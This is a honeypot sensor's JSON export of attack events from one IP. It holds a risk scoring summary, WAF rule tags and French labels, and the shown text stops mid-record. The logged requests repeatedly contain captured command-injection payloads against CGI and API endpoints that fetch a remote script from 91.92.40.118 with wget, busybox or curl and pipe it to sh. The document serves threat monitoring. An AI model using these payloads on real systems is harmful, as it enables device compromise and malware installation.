{"ip":"45.153.34.219","exported_at":"2026-07-14T07:27:53+00:00","period_days":30,"metrics":{"events7d":90,"distinct_ports":2,"distinct_classifications":6,"max_severity":10,"last_sensor_id":"paris-1","max_waf_score":87,"max_risk_score":81,"attack_stage":"exploit_attempt","attack_chain_stage":"exploitation","threat_family":["path_traversal","config_leak_scan"],"recommended_action":"investigate","confidence":1,"risk_breakdown":{"waf":100,"classification":74,"behavior":0,"geo":0,"protocol":35,"novelty":30},"mitre_tactics":["TA0001","TA0002"],"mitre_technique":"T1083","top_mitre_technique":"T1059","top_mitre_count":48,"executive_one_liner_fr":"Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP","campaign_hint_fr":null,"confidence_breakdown":{"waf":100,"classification":74,"behavior":0,"geo":0,"protocol":35,"novelty":30,"risk_score":64},"persona_hostname":"mail.sensor-1.internal","correlation_flags":[],"correlation_flags_labels_fr":[],"confidence_pct":100,"confidence_hint_fr":null,"sensor_role_label_fr":"Renseignement menaces","tags_summary_labels_fr":["Http Sensitive","Upstream","Waf Score"],"tags_summary":["INT-http_sensitive","INT-upstream","INT-waf-score"],"attack_vector":"config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026","protocol_details":{"http_method":"GET","http_path":"\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026","request_line":"GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026","port":82,"service":"http","service_label_fr":"HTTP"},"protocol_summary_fr":"GET \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026 \u00b7 HTTP:82","evidence_snippet":"GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb","target_port_label":"82 \u00b7 HTTP","emulator_service":"http","confidence_reason":"Confiance 100 % \u2014 9 tag(s) WAF","classification_reason":"Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%","classification_reason_label_fr":"Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%","confidence_factors_fr":"Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF","payload_preview":"GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb"},"events":[{"id":11809390,"ip":"45.153.34.219","ts":"2026-07-14 02:18:17.000000","proto":"tcp","src_port":54854,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":58,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022]","http_method":"GET","http_target":"\/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022e67006b122fd955c6e4fea8ba6389299c1ad524e\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 274, \u0022payload_entropy\u0022: 5.030599611105556, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u00227369d313014bedcd79fdbcc2382dc9985dce62a1\u0022, \u0022event_fingerprint\u0022: \u0022a6f1f86585249f6d6841d0d253d5895b0f5253cd\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00221cf76fc3b6069d8e4f7c7c20c5228184\u0022, \u0022path_pattern_hash\u0022: \u00220af7fa5ddcabcc18b8efcc02ccd6f4d6\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nCon\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022f6c5f828e75e70b9f5d2a1fb3f1d8f31b00a2096\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20genie%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/api\/ping?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20genie%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_idor_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_suspicious_params\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_idor_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022http_suspicious_params\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":274},{"id":11809391,"ip":"45.153.34.219","ts":"2026-07-14 02:18:17.000000","proto":"tcp","src_port":54864,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/remote_link3.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00229d3dc4a8fb25011a455876c70b2b86adbab83cd0\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 320, \u0022payload_entropy\u0022: 5.2096970683746715, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c646f31985be564f8ea585a35c4a8c6b8894c061\u0022, \u0022event_fingerprint\u0022: \u00228401202548a30fc1d4fd1a65c003aba12acdaa6e\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022d802249330e403349f1daae0907c2d5c\u0022, \u0022path_pattern_hash\u0022: \u0022d36ef7dbd432d8eb2261edf7e6706be8\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 1\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 167\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s iodata;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 1\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 167\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s iodata;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 1\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00221bae5dcd18bc785f8d5468ca8d335be95f391b72\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022port\u0022: 